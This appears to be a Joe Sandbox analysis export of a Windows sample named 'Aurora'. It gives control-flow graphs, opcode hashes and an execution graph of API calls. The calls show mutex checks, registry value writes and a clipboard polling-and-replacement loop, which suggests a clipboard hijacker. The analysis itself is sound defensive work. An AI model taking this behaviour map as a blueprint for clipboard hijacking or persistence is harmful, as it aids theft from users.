                                    • API String ID: 4241100979-0
                                    • Opcode ID: 8941a4c10bf7c06310917594757326eb427ed630aef78628057d0baa293c02bd
                                    • Instruction ID: 8f44eb4abf21e50d5e5f6a7f049b2134d3a95d90390cf039ffd615f26842b9e5
                                    • Opcode Fuzzy Hash: 8941a4c10bf7c06310917594757326eb427ed630aef78628057d0baa293c02bd
                                    • Instruction Fuzzy Hash: 7A21A1B15053809FE752CB25DD94B52BFB8EF46210F0984EBE844CF252D234D909CB61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 48 244ab14-244ab5a 50 244ab5c 48->50 51 244ab5f-244ab68 48->51 50->51 52 244aba9-244abae 51->52 53 244ab6a-244ab8a ShellExecuteExW 51->53 52->53 56 244abb0-244abb5 53->56 57 244ab8c-244aba8 53->57 56->57
                                    APIs
                                    • ShellExecuteExW.SHELL32(?), ref: 0244AB70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID:
                                    • API String ID: 587946157-0
                                    • Opcode ID: a5e2ed26825f3e62b9ce18227a30af3d41b116b81a687a1916907c03b4b3fe5b
                                    • Instruction ID: 27a87d6bf23dbdb5a50b3d5473f87f85565113975e749a8911c97de60c9024a3
                                    • Opcode Fuzzy Hash: a5e2ed26825f3e62b9ce18227a30af3d41b116b81a687a1916907c03b4b3fe5b
                                    • Instruction Fuzzy Hash: 7B1160756093809FD752CF25DC94B52BFB8DF46220F0884EBED45CB652D264E908CB62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 37 244a872-244a8c9 40 244a90d-244a912 37->40 41 244a8cb-244a8d3 WriteFile 37->41 40->41 43 244a8d9-244a8eb 41->43 44 244a914-244a919 43->44 45 244a8ed-244a90a 43->45 44->45
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000E4C,A5383B35,00000000,00000000,00000000,00000000), ref: 0244A8D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 4b01f212514726e07ff33caeb7f763d7e44cf95171a6d0f55b5f089f708eff08
                                    • Instruction ID: 6a1afdf6d75a10e85623eeeff822a37b397271ea380c1c2187d0b92868c0a256
                                    • Opcode Fuzzy Hash: 4b01f212514726e07ff33caeb7f763d7e44cf95171a6d0f55b5f089f708eff08
                                    • Instruction Fuzzy Hash: 3C11C176500200AFEB21CF51DC44FAAFBA8EF54324F08885BE9459BA52D774E549CBB1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 59 244a52e-244a552 60 244a554 59->60 61 244a557-244a55d 59->61 60->61 62 244a562-244a56b 61->62 63 244a55f 61->63 64 244a5ac-244a5b1 62->64 65 244a56d-244a575 CreateDirectoryW 62->65 63->62 64->65 66 244a57b-244a58d 65->66 68 244a5b3-244a5b8 66->68 69 244a58f-244a5ab 66->69 68->69
                                    APIs
                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 0244A573
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: CreateDirectory
                                    • String ID:
                                    • API String ID: 4241100979-0
                                    • Opcode ID: d07af2b9183303ed6bc210dbbf82d751981a3ae4ab0e878818dbbee0a9a63355
                                    • Instruction ID: c05460df6aab7f61bd40066ccc0eb602f168b4c53871e646b26958f13d9a551d
                                    • Opcode Fuzzy Hash: d07af2b9183303ed6bc210dbbf82d751981a3ae4ab0e878818dbbee0a9a63355
                                    • Instruction Fuzzy Hash: FA115E75A402408FEB50CF19D984B66FBE8EF54220F08C4ABDD49CB745D774E448CB61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 71 244a3b8-244a404 73 244a406-244a419 SetErrorMode 71->73 74 244a42f-244a434 71->74 75 244a436-244a43b 73->75 76 244a41b-244a42e 73->76 74->73 75->76
                                    APIs
                                    • SetErrorMode.KERNELBASE(?), ref: 0244A40C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: 06c00a8c74a4f34639e3476bc4f461b9813b2bfc75e7a123a4751b436c4fdb2e
                                    • Instruction ID: 6bb80016c89d7a7f2174cab1e4bcb8914905c7b99340e011f4b9ca429ce66398
                                    • Opcode Fuzzy Hash: 06c00a8c74a4f34639e3476bc4f461b9813b2bfc75e7a123a4751b436c4fdb2e
                                    • Instruction Fuzzy Hash: F21161755093C4AFD7528F15DC58B62FFB4DF46624F0880DBED858B252D275A808CB72

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 89 244acae-244acd2 90 244acd4 89->90 91 244acd7-244ace0 89->91 90->91 92 244ad21-244ad26 91->92 93 244ace2-244acea DeleteFileW 91->93 92->93 95 244acf0-244ad02 93->95 96 244ad04-244ad20 95->96 97 244ad28-244ad2d 95->97 97->96
                                    APIs
                                    • DeleteFileW.KERNELBASE(?), ref: 0244ACE8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 2c259570836c7f2967f6cc4ec9da82ee3f28969b57168929295f0e6cd8ae4e6e
                                    • Instruction ID: c12605cd57ed67814ede0edcabe3188537985398d372a7ed65c76eeb563e3d18
                                    • Opcode Fuzzy Hash: 2c259570836c7f2967f6cc4ec9da82ee3f28969b57168929295f0e6cd8ae4e6e
                                    • Instruction Fuzzy Hash: A1019EB2A402408FEB50CF26D885766FBE8EF44225F08C4ABDD09CB742DB74E544CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 79 244ab36-244ab5a 80 244ab5c 79->80 81 244ab5f-244ab68 79->81 80->81 82 244aba9-244abae 81->82 83 244ab6a-244ab72 ShellExecuteExW 81->83 82->83 85 244ab78-244ab8a 83->85 86 244abb0-244abb5 85->86 87 244ab8c-244aba8 85->87 86->87
                                    APIs
                                    • ShellExecuteExW.SHELL32(?), ref: 0244AB70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID:
                                    • API String ID: 587946157-0
                                    • Opcode ID: 1382485a91f230d491dad82b711cf5eeece45b94878cfd9c729534a10a9c7117
                                    • Instruction ID: 4644ca1000bb7639706c11a3eb308842bc57b373c5d303ed029c797ff1e7a592
                                    • Opcode Fuzzy Hash: 1382485a91f230d491dad82b711cf5eeece45b94878cfd9c729534a10a9c7117
                                    • Instruction Fuzzy Hash: 18019275A002408FEB50CF25D884766FBE4DF45220F08C4ABDE09CB742D774E548CB62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 99 244a3da-244a404 100 244a406-244a419 SetErrorMode 99->100 101 244a42f-244a434 99->101 102 244a436-244a43b 100->102 103 244a41b-244a42e 100->103 101->100 102->103
                                    APIs
                                    • SetErrorMode.KERNELBASE(?), ref: 0244A40C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993039356.000000000244A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_244a000_Aurora.jbxd
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: f13f921edb921a567b66154b618d1e7f71587d203f894922de46c9924f8ed4ce
                                    • Instruction ID: 00b8f018747e36eefaeb26924dd9a1982077bd9e9ab2e06c89934d24ce6d083b
                                    • Opcode Fuzzy Hash: f13f921edb921a567b66154b618d1e7f71587d203f894922de46c9924f8ed4ce
                                    • Instruction Fuzzy Hash: D9F0AF759042508FEB60CF05D888766FBA0EF55225F4CC0ABDD094B752D7B9E449CBA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 271 6430070-643007f 317 6430085 call 6430140 271->317 318 6430085 call 6430070 271->318 319 6430085 call 6430006 271->319 320 6430085 call 41a05df 271->320 321 6430085 call 41a0606 271->321 272 643008b-64300b1 275 64300b3-64300c9 272->275 276 64300de-64300f0 272->276 277 6430135-6430192 275->277 278 64300cb-64300dc 275->278 276->277 283 64300f2-6430123 276->283 288 6430199-64301af 277->288 278->275 278->276 291 643012d-6430134 283->291 293 6430222-6430235 288->293 294 64301b1-64301bd 288->294 295 6430248-643024c 293->295 299 64301cb-64301cd 294->299 300 64301bf-64301c5 294->300 296 6430257 295->296 297 643024e 295->297 303 6430258 296->303 297->296 304 6430237-6430241 299->304 305 64301cf-64301db 299->305 301 64301c7 300->301 302 64301c9 300->302 301->299 302->299 303->303 304->293 310 6430243 304->310 308 64301f5-6430200 305->308 309 64301dd-64301e3 305->309 308->304 315 6430202-6430220 308->315 311 64301e7-64301f3 309->311 312 64301e5 309->312 310->294 310->295 311->308 312->308 315->295 317->272 318->272 319->272 320->272 321->272
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c59867f1c90fd244f9eb604eae63761b556ac47576a0463ac20a64dac2fe7814
                                    • Instruction ID: 7e9515548dcaf4f5ffe513a8ab63370abc6fab7ec4feae3b92825dfbad42d141
                                    • Opcode Fuzzy Hash: c59867f1c90fd244f9eb604eae63761b556ac47576a0463ac20a64dac2fe7814
                                    • Instruction Fuzzy Hash: BE510231F002258FCB55AB7884557AEBBF2AF89604F14826AD806DB784CF31CC06CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 322 6430006-643007f 324 643008b-64300b1 322->324 369 6430085 call 6430140 322->369 370 6430085 call 6430070 322->370 371 6430085 call 6430006 322->371 372 6430085 call 41a05df 322->372 373 6430085 call 41a0606 322->373 327 64300b3-64300c9 324->327 328 64300de-64300f0 324->328 329 6430135-6430192 327->329 330 64300cb-64300dc 327->330 328->329 335 64300f2-6430123 328->335 340 6430199-64301af 329->340 330->327 330->328 343 643012d-6430134 335->343 345 6430222-6430235 340->345 346 64301b1-64301bd 340->346 347 6430248-643024c 345->347 351 64301cb-64301cd 346->351 352 64301bf-64301c5 346->352 348 6430257 347->348 349 643024e 347->349 355 6430258 348->355 349->348 356 6430237-6430241 351->356 357 64301cf-64301db 351->357 353 64301c7 352->353 354 64301c9 352->354 353->351 354->351 355->355 356->345 362 6430243 356->362 360 64301f5-6430200 357->360 361 64301dd-64301e3 357->361 360->356 367 6430202-6430220 360->367 363 64301e7-64301f3 361->363 364 64301e5 361->364 362->346 362->347 363->360 364->360 367->347 369->324 370->324 371->324 372->324 373->324
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7ad6a5a7d723d0b1a42e53bf8d1f3224bba97a449e03ac25029a725836e87e2
                                    • Instruction ID: eeb5da1c1c9355114ea2471febbcdc5692351ef229090d5f05e56efeec5b7da5
                                    • Opcode Fuzzy Hash: e7ad6a5a7d723d0b1a42e53bf8d1f3224bba97a449e03ac25029a725836e87e2
                                    • Instruction Fuzzy Hash: 1341D53460A3D04FC7039B749D606AABFF1AF57254B1942D7D485CF293CA249C0AC771
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7a843415b61715c1ef5eaa3c7df6afbe80def0e86e1c27750ffe260cf12a5d82
                                    • Instruction ID: fd21e933d32ab3df424e634491728a50df0465b6dfaf82a96d34d672d19b3fe4
                                    • Opcode Fuzzy Hash: 7a843415b61715c1ef5eaa3c7df6afbe80def0e86e1c27750ffe260cf12a5d82
                                    • Instruction Fuzzy Hash: A131F731E002288FDB16DBA9D8813EFBBB2EF89350F24422BE455AB395C6315C01CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 578 6430847-6430850 579 6430852-6430866 578->579 580 6430868-64308b7 578->580 579->580 586 64308b9-64308c5 580->586 587 6430918-643092b 580->587 592 64308c7-64308cd 586->592 593 64308df-64308ea 586->593 588 643092d-6430931 587->588 590 6430933 588->590 591 643093c 588->591 590->591 594 64308d1-64308dd 592->594 595 64308cf 592->595 598 643090c-6430916 593->598 599 64308ec 593->599 594->593 595->593 598->586 598->587 600 64308f4-643090a 599->600 600->588
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ecbb5bf4a3904b74cdc0f71fc62eac5acf4e7df34df41546134cb636a31c4ad
                                    • Instruction ID: 417aa79e0c20b6bbe91ce9c58f30eec8d83799087c45a8b3846e18ec3550fff7
                                    • Opcode Fuzzy Hash: 2ecbb5bf4a3904b74cdc0f71fc62eac5acf4e7df34df41546134cb636a31c4ad
                                    • Instruction Fuzzy Hash: 7D21AE31A00229CFEB65AB6584597BE7BF6AF8CA10F14022AD406E7780DB358C06CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 557 64306a0-64306f2 call 6430847 561 64306f4 557->561 562 64306f9-643076a 557->562 563 643083f-6430846 561->563 573 6430773-643078f 562->573 575 6430791 573->575 576 643079a 573->576 575->576 576->563
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e6bb6d5733bee7c8f8442b27a9b47bbe089f1d804d96ac5af8119f6497dd084
                                    • Instruction ID: b95fe55ccca2bc50f4dec96f92d82e7dc66a8336ff5b8b52b8f81d3220ba095e
                                    • Opcode Fuzzy Hash: 6e6bb6d5733bee7c8f8442b27a9b47bbe089f1d804d96ac5af8119f6497dd084
                                    • Instruction Fuzzy Hash: 8E314E35F012189FCB48EBA8E454ADEBBF2AF88614F10816AE406E7750DF319C45CF90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d25157b7c3f1a5f5e58206cce5854d76493a4c2f1818abbb36aed5c85bc7bbf2
                                    • Instruction ID: 2126fceb142ab2d95d4aa4b406317179472c16078d9d11d88f03e0f479f96171
                                    • Opcode Fuzzy Hash: d25157b7c3f1a5f5e58206cce5854d76493a4c2f1818abbb36aed5c85bc7bbf2
                                    • Instruction Fuzzy Hash: 6421B131F002698BDFA6AA7480597BE7EF29B8C614F15426AC805E7744DF318C46CB91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59cdd376708f93040b16e5993f694a3f06e2a5f398428a5530fa47ef319534be
                                    • Instruction ID: 5c396549157af6af8b20da5f8d1500d2a5ce05fc1d145fcf0954a1158fbfae89
                                    • Opcode Fuzzy Hash: 59cdd376708f93040b16e5993f694a3f06e2a5f398428a5530fa47ef319534be
                                    • Instruction Fuzzy Hash: 6311C3397112618B9B6B96316560BFF36939FCE558314822ED902CB784EF38DD0AC391
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 97017c7ef88a4e6954d3537c63c85de6e7dc916b3c6d11ea2b44cf2560ba3c5b
                                    • Instruction ID: c1cb8d70708290ba6455f6468b08b31a0c6c72d924ad0da35ea5281df0c10848
                                    • Opcode Fuzzy Hash: 97017c7ef88a4e6954d3537c63c85de6e7dc916b3c6d11ea2b44cf2560ba3c5b
                                    • Instruction Fuzzy Hash: 1531E635E00618DFDB49CF98D484A9EBBB2BF48314F21856AE815AB354DB31ED46CF80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1994256787.00000000041A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_41a0000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3b91e92e9b9e45471df321b6467be4f812987dcbd00e6a907cfea7139b562b8
                                    • Instruction ID: cd930bedfdfa0ba9f4860c8334ab611a890211f1729227cf55f10ac4b11e8bd7
                                    • Opcode Fuzzy Hash: f3b91e92e9b9e45471df321b6467be4f812987dcbd00e6a907cfea7139b562b8
                                    • Instruction Fuzzy Hash: D301DBB55093846FD7128F15AC40862FFA8EED6220709C0AFEC4987612D225B409C7B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ff8aefe00367dd2c5aa0805e7ad5dbc24edf3db858353d7c67fadcfe85550230
                                    • Instruction ID: 327e8d38a147ebc1c1aef2259c519fd8196f4ff5272733623c8077f4e3d00048
                                    • Opcode Fuzzy Hash: ff8aefe00367dd2c5aa0805e7ad5dbc24edf3db858353d7c67fadcfe85550230
                                    • Instruction Fuzzy Hash: 5401A235E011189FCB598B78A9566EEBFB5EB8C260B10827AE805E3300DA315C178BE0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2065658595.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6430000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 138de89c5fc4aa0c909fa8f7ef5be306527f7f078172c56db56fbe686cf5605e
                                    • Instruction ID: 5465cca4c993024d2e9f1bc24b09c13adf29cad2010e3ee9c41d740624bdbe79
                                    • Opcode Fuzzy Hash: 138de89c5fc4aa0c909fa8f7ef5be306527f7f078172c56db56fbe686cf5605e
                                    • Instruction Fuzzy Hash: ACF04F39F00224CB8F49DB74E4559EDB7B2AF8D664B10816AC802A3780DF35AC06CFA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1994256787.00000000041A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_41a0000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a25a110ee25235659031e3097627cba8aafc2bf66b0291e1268d5e847ee1b872
                                    • Instruction ID: 5ca8fc8aa8055bd91074db16a3a1a4cd1cb788318119c6c319c3ee0a9ca2d55b
                                    • Opcode Fuzzy Hash: a25a110ee25235659031e3097627cba8aafc2bf66b0291e1268d5e847ee1b872
                                    • Instruction Fuzzy Hash: 12E092B66006444B9650CF0AFC41452F7D4EBC4630718C07FDC0D8B701E275B508CAA6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1993003159.0000000002442000.00000040.00000800.00020000.00000000.sdmp, Offset: 02442000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2442000_Aurora.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 560e034b87df9cf103a12e1573f2a85b684151d13fdbcec00c76c05cebeef952
                                    • Instruction ID: 38889486bb6d705709cc7d40d0af74862ba40a866e49255058b753416c06c51e
                                    • Opcode Fuzzy Hash: 560e034b87df9cf103a12e1573f2a85b684151d13fdbcec00c76c05cebeef952
                                    • Instruction Fuzzy Hash: DAD05E342005814BE715CA1CC6E4F5A37E4AB40B0DF0644E9BC108B762C7F8D8C8DA00

                                    Execution Graph

                                    Execution Coverage:8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:9.4%
                                    Total number of Nodes:1225
                                    Total number of Limit Nodes:2
                                    execution_graph 5733 7ff6c12addf0 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 5734 7ff6c12adfee ??1facet@locale@std@@MEAA 5735 7ff6c12aaff4 5743 7ff6c12ac8d4 GetLocaleInfoEx FormatMessageA 5735->5743 5738 7ff6c12ab041 5741 7ff6c12a1d68 5 API calls 5738->5741 5739 7ff6c12ab023 memmove 5740 7ff6c12ab059 LocalFree 5739->5740 5742 7ff6c12ab058 5741->5742 5742->5740 5744 7ff6c12ab010 5743->5744 5744->5738 5744->5739 5745 7ff6c12a65e8 __std_exception_destroy 5746 7ff6c12a660f 5745->5746 4720 7ff6c12ad160 4721 7ff6c12ad174 __scrt_initialize_crt 4720->4721 4722 7ff6c12ad2ac 4721->4722 4723 7ff6c12ad17c __scrt_acquire_startup_lock 4721->4723 4867 7ff6c12ad4fc IsProcessorFeaturePresent 4722->4867 4725 7ff6c12ad2b6 4723->4725 4730 7ff6c12ad19a __scrt_release_startup_lock 4723->4730 4726 7ff6c12ad4fc 9 API calls 4725->4726 4727 7ff6c12ad2c1 4726->4727 4729 7ff6c12ad2c9 _exit 4727->4729 4728 7ff6c12ad1bf 4730->4728 4731 7ff6c12ad245 4730->4731 4735 7ff6c12ad23d _register_thread_local_exe_atexit_callback 4730->4735 4742 7ff6c12ad648 memset GetStartupInfoW 4731->4742 4733 7ff6c12ad24a _get_wide_winmain_command_line 4743 7ff6c12ab900 4733->4743 4735->4731 4739 7ff6c12ad271 4740 7ff6c12ad276 _cexit 4739->4740 4741 7ff6c12ad27b 4739->4741 4740->4741 4741->4728 4742->4733 4744 7ff6c12ab956 OpenMutexA 4743->4744 4746 7ff6c12ab982 4744->4746 4747 7ff6c12ab989 _dupenv_s 4744->4747 5013 7ff6c12ad030 4746->5013 4747->4746 4748 7ff6c12ab9b2 4747->4748 4748->4746 4873 7ff6c12a1d68 4748->4873 4755 7ff6c12aba49 free 4757 7ff6c12aba6e 4755->4757 4756 7ff6c12aba44 4756->4755 4893 7ff6c12a23e8 4757->4893 4758 7ff6c12aba3d _invalid_parameter_noinfo_noreturn 4758->4756 4764 7ff6c12abaf3 4928 7ff6c12aa294 4764->4928 4766 7ff6c12abaff GetModuleFileNameA 4932 7ff6c12a23a4 4766->4932 4768 7ff6c12abb2a 4864 7ff6c12ac53b 4768->4864 4936 7ff6c12a5284 4768->4936 4769 7ff6c12aa294 _invalid_parameter_noinfo_noreturn 4771 7ff6c12ac54c 4769->4771 4773 7ff6c12ac58b 4771->4773 4777 7ff6c12ac584 _invalid_parameter_noinfo_noreturn 4771->4777 4772 7ff6c12abb89 4939 7ff6c12a18c8 4772->4939 4774 7ff6c12aa294 _invalid_parameter_noinfo_noreturn 4773->4774 4776 7ff6c12ac5b4 CreateMutexA 4774->4776 4780 7ff6c12ac5f0 Sleep GetClipboardSequenceNumber 4776->4780 4777->4773 4780->4780 4782 7ff6c12ac609 OpenClipboard 4780->4782 4781 7ff6c12a18c8 7 API calls 4783 7ff6c12abc45 4781->4783 4782->4780 4784 7ff6c12ac615 4782->4784 4951 7ff6c12a24ac 4783->4951 4784->4780 4796 7ff6c12a670c GetClipboardSequenceNumber CloseClipboard 4784->4796 4802 7ff6c12ac709 memmove 4784->4802 4803 7ff6c12ac885 _invalid_parameter_noinfo_noreturn 4784->4803 4806 7ff6c12ac87e _invalid_parameter_noinfo_noreturn 4784->4806 4807 7ff6c12ac7a7 GlobalAlloc 4784->4807 4977 7ff6c12a6670 GetClipboardData 4784->4977 4984 7ff6c12a1e44 4784->4984 4998 7ff6c12a49b0 4784->4998 5002 7ff6c12a1a34 4784->5002 5006 7ff6c12a630c 4784->5006 4790 7ff6c12a18c8 7 API calls 4792 7ff6c12abcaf 4790->4792 4793 7ff6c12a24ac 32 API calls 4792->4793 4794 7ff6c12abcfb 4793->4794 4797 7ff6c12a18b4 7 API calls 4794->4797 4796->4784 4798 7ff6c12abd0a 4797->4798 4800 7ff6c12a18c8 7 API calls 4798->4800 4801 7ff6c12abd19 4800->4801 4805 7ff6c12a18c8 7 API calls 4801->4805 4802->4784 4803->4746 4808 7ff6c12abd6c 4805->4808 4806->4803 4807->4784 4809 7ff6c12ac7c1 memmove EmptyClipboard SetClipboardData 4807->4809 4810 7ff6c12a24ac 32 API calls 4808->4810 4809->4784 4811 7ff6c12abdb8 4810->4811 4812 7ff6c12a18b4 7 API calls 4811->4812 4813 7ff6c12abdc7 4812->4813 4814 7ff6c12a18c8 7 API calls 4813->4814 4815 7ff6c12abdd6 4814->4815 4816 7ff6c12a18c8 7 API calls 4815->4816 4817 7ff6c12abe14 4816->4817 4818 7ff6c12a24ac 32 API calls 4817->4818 4819 7ff6c12abe60 4818->4819 4820 7ff6c12a18b4 7 API calls 4819->4820 4821 7ff6c12abe6f 4820->4821 4822 7ff6c12a18c8 7 API calls 4821->4822 4823 7ff6c12abedc 4822->4823 4824 7ff6c12a18c8 7 API calls 4823->4824 4825 7ff6c12abf27 4824->4825 4826 7ff6c12a24ac 32 API calls 4825->4826 4827 7ff6c12abf73 4826->4827 4828 7ff6c12a18b4 7 API calls 4827->4828 4829 7ff6c12abf82 4828->4829 4830 7ff6c12a18c8 7 API calls 4829->4830 4831 7ff6c12abf91 4830->4831 4832 7ff6c12a18c8 7 API calls 4831->4832 4833 7ff6c12abfd8 4832->4833 4834 7ff6c12a24ac 32 API calls 4833->4834 4835 7ff6c12ac024 4834->4835 4836 7ff6c12a18b4 7 API calls 4835->4836 4837 7ff6c12ac033 4836->4837 4838 7ff6c12a18c8 7 API calls 4837->4838 4839 7ff6c12ac072 4838->4839 4840 7ff6c12a18c8 7 API calls 4839->4840 4842 7ff6c12ac081 4840->4842 4841 7ff6c12ac24f _invalid_parameter_noinfo_noreturn 4843 7ff6c12ac256 4841->4843 4842->4841 4842->4843 4843->4843 4844 7ff6c12ac2c8 RegCreateKeyA 4843->4844 4845 7ff6c12a24ac 32 API calls 4844->4845 4846 7ff6c12ac331 4845->4846 4847 7ff6c12a24ac 32 API calls 4846->4847 4848 7ff6c12ac382 RegSetValueExA 4847->4848 4849 7ff6c12ac3c7 4848->4849 4850 7ff6c12ac443 4849->4850 4852 7ff6c12ac43c _invalid_parameter_noinfo_noreturn 4849->4852 4968 7ff6c12ab754 4850->4968 4852->4850 4854 7ff6c12ac4af 4974 7ff6c12a5d28 4854->4974 4855 7ff6c12ac482 4855->4854 4857 7ff6c12ac4a8 _invalid_parameter_noinfo_noreturn 4855->4857 4857->4854 4864->4769 4865 7ff6c12ad690 GetModuleHandleW 4866 7ff6c12ad26d 4865->4866 4866->4727 4866->4739 4868 7ff6c12ad522 4867->4868 4869 7ff6c12ad530 memset RtlCaptureContext RtlLookupFunctionEntry 4868->4869 4870 7ff6c12ad5a6 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 